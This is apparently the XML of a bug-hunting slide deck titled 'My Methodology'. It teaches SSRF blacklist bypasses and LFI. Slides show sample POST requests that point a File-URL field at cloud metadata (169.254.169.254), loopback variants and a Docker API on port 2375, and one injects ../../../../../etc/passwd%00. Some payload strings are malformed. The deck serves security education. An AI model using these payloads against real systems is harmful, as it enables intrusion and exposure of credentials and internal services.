            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::ffff:169.254.169.254]/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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669" name="Google Shape;669;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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0" name="Google Shape;670;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="671" name="Google Shape;671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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="673" name="Google Shape;673;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.127.127.127</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://127.127.127.127.127/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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681" name="Google Shape;681;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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2" name="Google Shape;682;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="683" name="Google Shape;683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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="685" name="Google Shape;685;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="36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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0.0.0.0:PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="691" name="Google Shape;691;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://0.0.0..0:PORT/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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693" name="Google Shape;693;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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4" name="Google Shape;694;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="695" name="Google Shape;695;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Google Shape;696;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="697" name="Google Shape;697;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Google Shape;698;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="699" name="Google Shape;699;p7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64025" y="3091500"/>
            <a:ext cx="421000" cy="34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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::1]:PORT e.g. http://[::1]:2375/containers/json</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass Blacklist</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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POST /Interaction-File-URL HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.company.com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User-Agent: Mozilla/5.0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Content-Type: application/x-www-form-urlencoded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Referer: https://previous.com/path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Origin: https://www.company.com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Content-Length: Number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1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File-URL=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://[::1]:2375/containers/json</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287950" y="881988"/>
            <a:ext cx="1649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  <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343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707" name="Google Shape;707;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029975" y="364188"/>
            <a:ext cx="32700" cy="670500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343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8" name="Google Shape;708;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437300" y="516900"/>
            <a:ext cx="6371100" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="666666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FEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>My Methodology</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="709" name="Google Shape;709;p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538" y="-146801"/>
            <a:ext cx="1216525" cy="1181500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="710" name="Google Shape;710;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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Video</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="711" name="Google Shape;711;p7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2938" y="2675525"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Google Shape;712;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3040625"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Tweet</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="713" name="Google Shape;713;p7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22925" y="3110050"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="Google Shape;714;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3460050"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:u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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="715" name="Google Shape;715;p7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64025" y="3537325"/>
            <a:ext cx="421000" cy="34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6" name="Google Shape;716;p7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64025" y="3939925"/>
            <a:ext cx="421000" cy="347900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="3879475"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="718" name="Google Shape;718;p7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22925" y="4311450"/>
            <a:ext cx="503200" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="719" name="Google Shape;719;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="4277150"/>
            <a:ext cx="3128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700"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill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Writeup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFE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99999"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281400" y="1389075"/>
            <a:ext cx="8862600" cy="10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b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ../../../../../etc/passwd%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Content Of etc/passwd If There Is LFI </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3136000" y="2675525"/>
            <a:ext cx="4973700" cy="2071500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
